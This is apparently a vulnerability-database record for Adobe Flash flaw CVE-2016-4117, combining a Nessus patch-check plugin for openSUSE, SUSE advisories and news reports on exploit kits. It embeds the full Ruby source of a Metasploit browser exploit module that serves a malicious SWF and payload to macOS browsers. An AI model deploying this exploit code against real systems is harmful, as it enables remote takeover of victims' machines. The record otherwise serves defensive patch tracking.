{"id": "OPENSUSE-2016-587.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : flash-player (openSUSE-2016-587)", "description": "This security update for flash-player to 11.2.202.621 fixes the following issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html", "published": "2016-05-18T00:00:00", "modified": "2022-03-08T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/91204", "reporter": "This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=979422", "https://helpx.adobe.com/security/products/flash-player/apsa16-02.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117"], "cvelist": ["CVE-2016-4117"], "immutableFields": [], "lastseen": "2022-05-18T15:13:43", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201605-16", "ASA-201605-18"]}, {"type": "attackerkb", "idList": ["AKB:2D60486C-E757-4423-BC79-7E5CE137970D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0350"]}, {"type": "cve", "idList": ["CVE-2016-4117"]}, {"type": "exploitdb", "idList": ["EDB-ID:46339"]}, {"type": "fireeye", "idList": ["FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "FIREEYE:529A9C9970A2887D6BB05A18FF5EB97C", "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "FIREEYE:F598C2CB5A87E8844CDF2684E4B9200D", "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "FIREEYE:FE931C46CDF99DA3A4567E123E342C99"]}, {"type": "freebsd", "idList": ["0C6B008D-35C4-11E6-8E82-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-08"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP", "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP/"]}, {"type": "mmpc", "idList": ["MMPC:A8911A071FAE866BC15F59CA0B325D45", "MMPC:AA804B66BAFEF336F846CBD7F0B391A2"]}, {"type": "mscve", "idList": ["MS:ADV160002"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["9354.PRM", "9371.PASL", "ADOBE_AIR_APSB16-15.NASL", "FLASH_PLAYER_APSB16-15.NASL", "FREEBSD_PKG_0C6B008D35C411E68E82002590263BF5.NASL", "GENTOO_GLSA-201606-08.NASL", "GOOGLE_CHROME_50_0_2661_102.NASL", "MACOSX_ADOBE_AIR_APSB16-15.NASL", "MACOSX_FLASH_PLAYER_APSB16-15.NASL", "MACOSX_GOOGLE_CHROME_50_0_2661_102.NASL", "OPENSUSE-2016-585.NASL", "REDHAT-RHSA-2016-1079.NASL", "SMB_NT_MS16-064.NASL", "SUSE_SU-2016-1305-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807698", "OPENVAS:1361412562310807699", "OPENVAS:1361412562310808100", "OPENVAS:1361412562310808101", "OPENVAS:1361412562310808102", "OPENVAS:1361412562310808104", "OPENVAS:1361412562310810654", "OPENVAS:1361412562310810655", "OPENVAS:1361412562310810656", "OPENVAS:1361412562310810657", "OPENVAS:1361412562310851312"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151589"]}, {"type": "redhat", "idList": ["RHSA-2016:1079"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-4117"]}, {"type": "securelist", "idList": ["SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1306-1", "OPENSUSE-SU-2016:1308-1", "OPENSUSE-SU-2016:1309-1", "SUSE-SU-2016:1305-1"]}, {"type": "thn", "idList": ["THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "THN:BF8375E3582DA11921BF468B0D3C4F03"]}, {"type": "threatpost", "idList": ["THREATPOST:11EA26F57D7D2191ABB8BCEDAE972C5B", "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "THREATPOST:57A3C5842284FA1358A0BA67A4DECF7D", "THREATPOST:65788483E3FE6F5E155BBFDFEB0DB640", "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "THREATPOST:8D1613F1DDC8479184A4F8C93BA951EF", "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "THREATPOST:D2016D9CC965B5E2634C0B28064F12A0"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-4117"]}, {"type": "zdt", "idList": ["1337DAY-ID-32146"]}]}, "score": {"value": 8.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201605-16", "ASA-201605-18"]}, {"type": "cve", "idList": ["CVE-2016-4117"]}, {"type": "fireeye", "idList": ["FIREEYE:F598C2CB5A87E8844CDF2684E4B9200D"]}, {"type": "freebsd", "idList": ["0C6B008D-35C4-11E6-8E82-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-08"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "mmpc", "idList": ["MMPC:AA804B66BAFEF336F846CBD7F0B391A2"]}, {"type": "mscve", "idList": ["MS:ADV160002"]}, {"type": "nessus", "idList": ["ADOBE_AIR_APSB16-15.NASL", "FLASH_PLAYER_APSB16-15.NASL", "FREEBSD_PKG_0C6B008D35C411E68E82002590263BF5.NASL", "GOOGLE_CHROME_50_0_2661_102.NASL", "MACOSX_GOOGLE_CHROME_50_0_2661_102.NASL", "REDHAT-RHSA-2016-1079.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810656"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151589"]}, {"type": "securelist", "idList": ["SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1308-1", "OPENSUSE-SU-2016:1309-1"]}, {"type": "threatpost", "idList": ["THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D"]}, {"type": "zdt", "idList": ["1337DAY-ID-32146"]}]}, "exploitation": null, "vulnersScore": 8.2}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "91204", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-587.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91204);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-4117\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-587)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This security update for flash-player to 11.2.202.621 fixes the\nfollowing issues (boo#979422) :\n\nA critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and\nChrome OS. Successful exploitation could cause a crash and potentially\nallow an attacker to take control of the affected system. (APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.621-162.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.621-162.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.621-162.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.1"], "solution": "Update the affected flash-player packages.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2016-05-17T00:00:00", "vulnerabilityPublicationDate": "2016-05-11T00:00:00", "exploitableWith": ["Metasploit(Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion)"]}

{"suse": [{"lastseen": "2016-09-04T12:14:55", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. (APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n", "cvss3": {}, "published": "2016-05-17T14:08:54", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-17T14:08:54", "id": "OPENSUSE-SU-2016:1308-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00046.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:25:42", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. (APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n", "cvss3": {}, "published": "2016-05-17T14:09:11", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-17T14:09:11", "id": "OPENSUSE-SU-2016:1309-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00047.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:17", "description": "This security update for flash-player to 11.2.202.621 fixes the following\n issues (boo#979422):\n\n A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player\n 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome\n OS. Successful exploitation could cause a crash and potentially allow an\n attacker to take control of the affected system. (APSA16-02)\n\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\">https://helpx.adobe.com/security/products/flash-player/apsa16-02.html</a>\n\n Some CVEs were not listed in the last submission:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-17T02:07:54", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2016-05-17T02:07:54", "id": "OPENSUSE-SU-2016:1306-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00045.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:44:54", "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\n", "cvss3": {}, "published": "2016-05-16T18:08:08", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2016-05-16T18:08:08", "id": "SUSE-SU-2016:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00044.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2019-02-10T19:00:54", "description": "", "cvss3": {}, "published": "2019-02-09T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2019-02-09T00:00:00", "id": "PACKETSTORM:151589", "href": "https://packetstormsecurity.com/files/151589/Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion', \n'Description' => %q( \nThis module exploits a type confusion on Adobe Flash Player, which was \noriginally found being successfully exploited in the wild. This module \nhas been tested successfully on: \nmacOS Sierra 10.12.3, \nSafari and Adobe Flash Player 21.0.0.182, \nFirefox and Adobe Flash Player 21.0.0.182. \n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Genwei Jiang', # FireEye original blog details on the vulnerability \n'bcook-r7' # Imported Metasploit module \n], \n'References' => \n[ \n['CVE', '2016-4117'], \n['BID', '90505'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'], \n['URL', 'http://www.securitytracker.com/id/1035826'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'], \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['osx'], \n'BrowserRequirements' => \n{ \nsource: /script|headers/i, \nos_name: lambda do |os| \nos =~ OperatingSystems::Match::MAC_OSX \nend, \nua_name: lambda do |ua| \ncase target.name \nwhen 'Mac OS X' \nreturn true if ua == Msf::HttpClients::SAFARI \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \nflash: lambda do |ver| \ncase target.name \nwhen 'Mac OS X' \nreturn true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ \n'Mac OS X', { \n'Platform' => 'osx', \n'Arch' => ARCH_X64 \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 27 2016', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri.end_with? 'swf' \nprint_status('Sending SWF...') \nsend_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache') \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache') \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(3..7)}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \n \nif target.name.include? 'osx' \nplatform_id = 'osx' \nend \nhtml_template = %(<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n) \n \nreturn html_template, binding \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf') \nFile.binread(path) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151589/adobe_flash_delete_range_tl_op.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:13", "description": "Crooks behind the revamped CryptXXX 3.100 ransomware have switched its distribution from the Angler Exploit Kit to the Neutrino Exploit Kit. The sudden change in distribution was spotted on Monday by researchers at the SANS Internet Storm Center.\n\n\u201cThis is not the first time we\u2019ve seen campaigns associated with ransomware switch between Angler EK and Neutrino EK,\u201d wrote Brad Duncan, handler at SANS Internet Storm Center. But he said the switch was noteworthy because SANS had not yet seen CryptXXX distributed by Neutrino.\n\nThe move comes as security experts report a resurgence of the CryptXXX ransomware that [was recently revamped](<https://threatpost.com/updated-cryptxxx-ransomware-big-money-potential/118464/>) with new encryption algorithm and a new StillerX credential-stealing module that gives attackers additional capabilities to monetize an attack.\n\nDuncan said groups behind Angler have dropped CryptXXX like a rock, for now. Over the past few days, he hasn\u2019t tracked any Angler samples that contain the CryptXXX payload.\n\nThe Neutrino EK is characterized by its targeting of the Java runtime environment including versions of Java. \u201cLast month, Neutrino EK was documented using Flash exploits based on [CVE-2016-4117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117>) effective against Adobe Flash Player up to version 21.0.0.213,\u201d Duncan wrote.\n\nThe Angler EK typically seeks to attack computers by exploiting Java and Flash Player vulnerabilities as well as the Microsoft Silverlight plugin.\n\nAccording to Duncan, on Monday he observed the [pseudo-Darkleech campaign](<Mitsubishi.docx>) began using Neutrino EK to send CryptXXX ransomware. On Tuesday, Duncan reported an even more virulent form of the attacks, finding a website with an injected script for both the pseudo-Darkleech campaign and the [EITest campaign](<http://researchcenter.paloaltonetworks.com/2016/03/unit42-how-the-eltest-campaigns-path-to-angler-ek-evolved-over-time/>). In both instances, infected sites were distributing the CryptXXX ransomware as a DLL file named either 2016-06-07-EITest-Neutrino-EK-payload-CryptXXX.dll or 2016-06-07-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll.\n\n\u201cI was able to generate traffic for each campaign, but I had to use two separate visits, because the pseudo-Darkleech script prevented the EITest script from generating any EK traffic,\u201d Duncan wrote in a technical [write-up of his findings](<https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/>).\n\nDuncan said while Neutrino EK traffic patterns have remained consistent, the only change of note is now the EK sticks to TCP port 80.\n", "cvss3": {}, "published": "2016-06-09T08:43:57", "type": "threatpost", "title": "CryptXXX Jumps From Angler to Neutrino Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-06-09T12:43:57", "id": "THREATPOST:D2016D9CC965B5E2634C0B28064F12A0", "href": "https://threatpost.com/cryptxxx-ransomware-jumps-from-angler-to-neutrino-exploit-kit/118570/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "description": "**Update **Exploits for the most recent [Adobe Flash Player zero-day vulnerability](<https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/>) have been integrated into the Angler, Neutrino and Magnitude exploit kits, and are leading compromised computers to different ransomware strains, banking malware, and a credential-stealing Trojan.\n\nA French researcher who goes by the handle Kafeine told Threatpost that Neutrino has embedded a [working exploit](<http://malware.dontneedcoffee.com/2016/05/cve-2016-4117-flash-up-to-2100213-and.html>) for CVE-2016-4117 while Magnitude has not fully implemented the exploit.\n\nKafeine this morning also confirmed that the Angler Exploit Kit has now integrated the same Flash zero day exploit. The Angler exploits, however, are dropping the Dridex banking Trojan. Dridex has primarily spread in spam and phishing emails, and used malicious macros embedded in Office documents to download the Trojan.\n\nKafeine said that Magnitude is firing exploits for Flash Player up to version 21.0.0.213, but the payloads are not executing, despite the presence of references to the vulnerable code. It could be that the exploit was not implemented correctly; Kafeine said that as of this morning the payloads were not working.\n\nDetection rates on VirusTotal for the Neutrino exploit [remains low](<https://www.virustotal.com/en/file/f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0a/analysis/>), only five of 56 as of this morning.\n\nThe Flash Player type-confusion zero-day vulnerability was patched on May 12 in an [emergency update](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>). Researchers at FireEye said they were [aware of the existence of exploits](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) for the flaw on May 8, which Adobe patched in short order.\n\nKafeine said today that in different passes with the exploit kit, he saw infection payloads that included CryptXXX, Cerber and DMA Locker ransomware, as well as the Gootkit Trojan.\n\nGootkit has also been [integrated into the Angler Exploit Kit](<http://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/>). Researchers at Cyphort said malvertising attacks were redirecting victims to Angler, which then downloads Bedep click-fraud malware and the Gootkit loader. Gootkit, which used primarily to steal online banking credentials, is loaded into memory and leaves no files on the victims\u2019 machines.\n\nOne day after the emergency Flash update, FireEye published details on the attacks it discovered and privately disclosed to Adobe. In its report, FireEye said exploits were embedded in Office documents hosted on the attackers site, and a dynamic DNS domain was used to reference the document and payload. This allowed the attacks to spread via URL or email attachments.\n\nFireEye said that the attacks worked against machines running Flash 21.0.0.196 and above; the exploits run shellcode, which downloads and executes a second shellcode that downloads and executes the malware and displays a decoy document to the victim. The malware also opens a backdoor and is capable of receiving new commands from the attackers.\n\nThe Magnitude EK, meanwhile, has been pushing Cerber ransomware almost exclusively. Researchers at Proofpoint discovered a [previous Adobe Flash zero day](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>) a month earlier was integrated into Magnitude and Nuclear exploit kits. Nuclear was moving Locky ransomware onto 